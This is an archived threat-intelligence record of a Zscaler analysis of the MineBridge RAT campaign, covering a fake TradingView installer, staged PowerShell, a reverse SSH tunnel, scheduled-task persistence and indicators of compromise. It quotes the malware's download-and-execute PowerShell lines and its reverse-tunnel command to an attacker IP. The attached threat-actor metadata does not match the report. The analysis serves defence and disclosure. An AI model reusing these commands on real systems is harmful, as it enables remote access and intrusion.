{ "id": "279297a7-6b2e-4d8a-bb68-e40c5d87ed55", "created_at": "2026-04-06T00:17:14.739625Z", "updated_at": "2026-04-10T13:12:44.376633Z", "deleted_at": null, "sha1_hash": "9be23126e184a79db12308cedfdfad62af23aa72", "title": "Demystifying the full attack chain of MineBridge RAT | Zscaler", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1448364, "plain_text": "Demystifying the full attack chain of MineBridge RAT | Zscaler\r\nBy Sudeep Singh, Sahil Antil\r\nPublished: 2021-06-24 · Archived: 2026-04-05 16:23:05 UTC\r\nIntroduction\r\nIn March 2021, threat actors started distributing MineBridge RAT with an updated distribution mechanism.\r\nMorphisec blogged about the partial attack chain of this new attack but they could not find the origin or initial\r\nstages of the attack chain.\r\nIn May 2021, Zscaler ThreatLabz was able to uncover all the components of this complex multi-stage attack chain\r\nwhich have never before been documented in their entirety in the public domain.\r\nWe've blogged about MineBridge RAT before, in February 2021. This is a RAT (remote access trojan) that\r\nmisuses the remote desktop software TeamViewer for DLL side-loading, enabling the threat actor to take a wide\r\narray of remote follow-on actions such as spying on users or deploying additional malware. It was first discovered\r\nin January 2020 targeting financial services organizations.\r\nWe discovered that the threat actors are now distributing MineBridge RAT through Windows Installer binaries\r\nwhich masquerade as trading applications. The different stages in this sophisticated attack chain leverage\r\nWindows scheduled tasks, PowerShell scripts, reverse SSH tunnels, legitimate binaries such as TeamViewer, and\r\nshortened URLs that ultimately lead to the MineBridge RAT execution.\r\nAttack flow\r\nFigure 1 below illustrates the full end-to-end attack chain.\r\n \r\nhttps://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat\r\nPage 1 of 11\n\nFigure 1: Complete end-to-end attack chain used to deliver MineBridge RAT\r\nTechnical analysis\r\nOn April 9th, 2021, threat actors registered the domain \"tradingview[.]cyou,\" a look-alike of the legitimate\r\nwebsite \"tradingview[.]com.\"\r\nA download link for the malicious TradingView Desktop application was placed on the homepage.\r\nThe official TradingView desktop application was launched by tradingview.com in December 2020 for the first\r\ntime. This indicates that the threat actor is quick at identifying such opportunities to leverage them in their attack\r\nchain. Within 4 months of launch of the new official trading application, the threat actor registered a new domain\r\nto distribute the malicious version of application.\r\nSimilar to this, other trading applications and bots often used by stock and crypto currency traders have also been\r\nabused by the threat actor. The complete list of file hashes is included in the IOCs section.\r\nFigure 2 and 3 below show the webpages corresponding to malicious and legitimate domains.\r\nhttps://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat\r\nPage 2 of 11\n\nFigure 2: Webpage of the malicious website\r\nFigure 3: Webpage of the legitimate website\r\nThe download link (hxxps://tradingview[.]cyou/tradeview.php) on the attacker-controlled domain leads to the\r\ndownload of a malicious Windows Installer.\r\nhttps://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat\r\nPage 3 of 11\n\nNote: We noticed that the download URL responds with the malicious Windows Installer only if the user-agent\r\nstring in the HTTP request headers corresponds to Windows 10 OS.\r\nFor the purpose of technical analysis, we will look at the Windows Installer with MD5 hash:\r\n4284ee1eef9dd7f020f5002d63def278 \r\nThe installer is an Inno package which masquerades as a TradingView Desktop application and is digitally signed\r\nby YUNIVELL, LLC. The thumbprint of the digital signature is: 93e9d0b1ea812672b825d7c6812d435cca9fff99\r\n \r\nFigure 4 below shows the content of the Inno package\r\nFigure 4: Contents of the Inno setup package\r\nBy pivoting on this thumbprint, we identified a few more trading applications which are used to spread\r\nMineBridge RAT as well. The hashes of these binaries are also mentioned in the Indicators of compromise\r\n(IOCs) section.\r\nUpon execution, this installer shows a GUI (Graphical User Interface) which spoofs a TradingView application\r\nwhile it performs malicious activities in the background.\r\nTo start malicious activities, the installer executes two PowerShell command lines which we have referred to as\r\nStage-1 PowerShell and Stage-2 PowerShell. The operations performed by these are explained in detail in the\r\nfollowing sections.\r\n \r\n[+] Stage-1 PowerShell\r\nFigure 5 below shows the relevant code section of Stage-1 PowerShell script.\r\nhttps://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat\r\nPage 4 of 11\n\nFigure 5: Stage-1 PowerShell code\r\nBelow are the main operations performed by it.\r\n1. Changes the current directory to: \"$env:programdata\\ssh\\\"\r\n2. Fetches SSHD config from the shortened URL: https://cutt[.]ly/UxtdKtn (redirects to: https://cloud-check[.]website/online/tunupd.php?f=cfg) and writes it to the file: sshd_config\r\n3. Adds the OpenSSH.Server Windows capability and starts the sshd service. Sets the startup type to Automatic.\r\n4. Changes directory to the path: \"$env:userprofile\" and creates the \".ssh\" directory. \r\n5. Fetches the SSH keys from the URL: https://cutt[.]ly/Zxtd1Kl (redirects to: https://cloud-check[.]website/online/tunupd.php?f=key) and writes them to the file: authorized_keys\r\n6. Fetches the RSA private keys from the URL: https://cutt[.]ly/yxtdOo3 (redirects to: https://cloud-check[.]website/online/tunupd.php?f=rsa) and writes them to the file: tun_id_rsa\r\n7. Downloads the SSH client binary from the URL: https://cutt[.]ly/ubfAKPb (redirects to: https://cloud-check[.]website/online/tunupd.php?f=ssh) and writes it to: ssh.exe\r\n8. Executes the following command to set up a reverse SSH tunnel from the victim’s machine at port 109 to the\r\nattacker’s server at port 32672.\r\n-N -R '+$RemotePort+':localhost:109 tun@'+$RemoteSrv+' -i \"'+$env:userprofile+'\\.ssh\\tun_id_rsa\" -o\r\n\"StrictHostKeyChecking=no\" -o \"ExitOnForwardFailure=yes\" -o \"ServerAliveInterval=10\" -o\r\n\"ServerAliveCountMax=10\"';\r\nHere,\r\n$RemoteSrv: 86[.]106[.]181[.]183\r\n$RemotePort: 32672\r\nNote: Reverse SSH tunnelling helps the threat actor to bypass firewall rules since outbound connection requests\r\nare generally not blocked.\r\nhttps://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat\r\nPage 5 of 11\n\n9. Creates a new scheduled task with the name, \"OneDrive Sync\" which executes the above command line upon\r\nLogon, and once every 20 minutes.\r\n[+] Stage-2 PowerShell\r\nFigure 6 below shows the relevant code section of Stage-2 PowerShell script.\r\n \r\nFigure 6: Stage-2 PowerShell code\r\nThe PowerShell script performs the following operations:\r\n1. Creates a scheduled task with the name, \"Google Disk Sync\" which runs twice every week and executes the\r\nfollowing code using PowerShell\r\n$b=\"https://\";\r\n$c=\"cutt[.]ly\";\r\n$d=\"/9nOFUuK\";\r\n$b+=$c;\r\n$b+=$d;\r\n$a=iwr $b -UseBasicPArsing |iex;\r\n$b=\"https://\";\r\n$c=\"cutt.ly\";\r\n$d=\"/HxPcxuH\";\r\n$b+=$c;\r\n$b+=$d;\r\n$a=iwr $b -UseBasicPArsing |iex;\r\nThis code performs following operations:\r\n●    Downloads and executes Stage-3 PowerShell code from: cutt[.]ly/9nOFUuK [redirects to:\r\nhttps://simpleclub[.]website/upd/?t=psns] which ultimately leads to NetSupport client execution.\r\n●    Downloads and executes Stage-4 PowerShell code from: cutt[.]ly/HxPcxuH [redirects to:\r\nhttps://simpleclub[.]site/upd/?t=pstv] which ultimately leads to MineBridge RAT execution.\r\nhttps://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat\r\nPage 6 of 11\n\n2. Creates a scheduled task with the name, \"Google Photo Sync\" which runs twice every week and executes the\r\nfollowing PowerShell command line:\r\n$b=\"https://\";\r\n$c=\"cutt[.]ly\";\r\n$d=\"/9nOFUuK\";\r\n$b+=$c;\r\n$b+=$d;\r\n$a=iwr $b -UseBasicPArsing |iex;\r\nThis again downloads and executes the Stage-3 PowerShell code from: https://cutt[.]ly/9nOFUuK [redirects to:\r\nhttps://simpleclub[.]website/upd/?t=psns]\r\nNote: We have not detailed the Stage-3 PowerShell and Stage-4 PowerShell in this blog since the details for these\r\ntwo are already covered in the Morphisec blog.\r\nZscaler Cloud Sandbox report\r\nFigure 7 below shows the Zscaler cloud sandbox report for MineBridge RAT DLL.\r\nFigure 7: Cloud sandbox report\r\nIn addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various\r\nlevels.\r\nPS.Downloader.MINEBRIDGE\r\nWin32.Backdoor.MINEBRIDGE\r\nMITRE ATT\u0026CK TTP Mapping\r\nhttps://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat\r\nPage 7 of 11\n\nID Tactic Technique\r\nT1566 Phishing\r\nAttacker hosted fake websites leading to malicious file\r\ndownload\r\nT1204.002 User Execution: Malicious File User executes the downloaded file\r\nT1059.001\r\nCommand and Scripting\r\nInterpreter: PowerShell\r\nUses PowerShell in multiple stages to download and\r\nexecute malicious payloads\r\nT1547.001\r\nRegistry Run Keys / Startup\r\nFolder\r\nCreates LNK file in the startup folder for payload\r\nexecution\r\nT1053.005\r\nScheduled Task/Job: Scheduled\r\nTask\r\nCreates scheduled task to execute PowerShell commands\r\nwhich further downloads and executes PowerShell scripts\r\nT1140\r\nDeobfuscate/Decode Files or\r\nInformation\r\nStrings and other data are obfuscated in the payloads\r\nT1036.004\r\nMasquerading: Masquerade Task\r\nor Service\r\nScheduled tasks are created with name masquerading\r\nGoogle and OneDrive\r\nT1036.005\r\nMasquerading: Match Legitimate\r\nName or Location\r\nDropped LNK file for persistence masquerades Windows\r\nDefender\r\nT1027.002\r\nObfuscated Files or Information:\r\nSoftware Packing\r\nPayloads are packed in layers\r\nT1574.002\r\nHijack Execution Flow: DLL\r\nSide-Loading\r\nUses legit TeamViewer binary with dll-side loading\r\nvulnerability\r\nhttps://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat\r\nPage 8 of 11\n\nT1056.002 Input Capture: GUI Input Capture\r\nCaptures TeamViewer generated UsedID and Password\r\nby hooking GUI APIs\r\nT1057 Process Discovery Verifies the name of parent process\r\nT1082 System Information Discovery Gathers system OS version info\r\nT1033 System Owner/User Discovery Gathers currently logged in Username\r\nT1572 Protocol Tunneling Creates Reverse SSH tunnel\r\nT1071.001\r\nApplication Layer Protocol:Web\r\nProtocols\r\nUses https for network communication\r\nT1041 Exfiltration Over C2 Channel Data is exfiltrated using existing C2 channel\r\nIndicators of compromise (IOCs)\r\n[+] Hashes\r\nMD5 FileName Type\r\n4284ee1eef9dd7f020f5002d63def278 TradingView.exe Installer\r\n68a010a3d0d25cfa13933199511ed897 Polarr_Setup (2).exe Installer\r\nffcd63dc98e64afbfea8718b747963d7 Bitcoin_Trade.exe Installer\r\n3281f3b30fb8f3c69b18cc7aadfdf697 Arbitrage_Bot.exe Installer\r\nhttps://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat\r\nPage 9 of 11\n\n796e091b18112e223749972c3f0888db Bitcoin_Trade.exe Installer\r\nb14632304a7543752fbf2e3b7c0eca59 msi.tiff (MineBridge RAT) Dll\r\n[+] C2 domains\r\nComponent Domain\r\nPhishing website\r\ntradingview[.]cyou\r\ntradingview[.]cloud\r\ntradingview[.]digital\r\ntradingview[.]life\r\nPowerShell payloads\r\ncloud-check[.]website\r\nsimpleclub[.]website\r\nsimpledomen[.]website\r\nsimpleclub[.]site\r\nReverse SSH tunnel 86.106.181[.]183:32672\r\nNetSupport client\r\nupdate-system[.]cn\r\nupdatesystem[.]website\r\nMineBridge RAT ninjakick[.]club\r\npolarrsearch[.]xyz\r\nrogaikopyta[.]xyz\r\nutkailipa[.]xyz\r\n5tvstar[.]cn\r\nhttps://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat\r\nPage 10 of 11\n\ngoldendragon888[.]cn\r\n[+] Windows Installer signer details\r\nSigner name: YUNIVELL, LLC \r\nThumbprint: 93E9D0B1EA812672B825D7C6812D435CCA9FFF99\r\n[+] Scheduled tasks name\r\nOneDrive sync\r\nGoogle Disk Sync\r\nGoogle Photo Sync\r\nExplore more Zscaler blogs\r\nSource: https://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat\r\nhttps://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat" ], "report_names": [ "demystifying-full-attack-chain-minebridge-rat" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434634, "ts_updated_at": 1775826764, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/9be23126e184a79db12308cedfdfad62af23aa72.pdf", "text": "https://archive.orkl.eu/9be23126e184a79db12308cedfdfad62af23aa72.txt", "img": "https://archive.orkl.eu/9be23126e184a79db12308cedfdfad62af23aa72.jpg" } }